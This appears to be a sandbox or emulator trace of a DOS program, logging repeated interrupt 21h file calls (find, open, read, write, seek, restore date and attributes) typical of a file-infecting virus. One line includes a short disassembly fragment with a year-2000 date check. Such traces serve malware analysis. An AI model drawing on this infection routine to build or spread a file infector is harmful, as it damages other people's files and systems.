2018-12-25T11:43:14.498314492Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.501227289Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.51656807Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.518041066Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.520182525Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.524521174Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.528334712Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.535330162Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.541789792Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.543527284Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.551595888Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.558003267Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.560825166Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.563329291Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.565708057Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.57462861Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.576530986Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.583919877Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.593559677Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.596418236Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.60779276Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.613831795Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.615865128Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.626241679Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.632753654Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.636315888Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.637571449Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.640531726Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.649912725Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.651946299Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.659529623Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.670068065Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.672697532Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.679017389Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.685888893Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.687516463Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.689810689Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.694348484Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.697004599Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.698867705Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.701540061Z	26	PC: 12b95 \| Set disk transfer address (See above)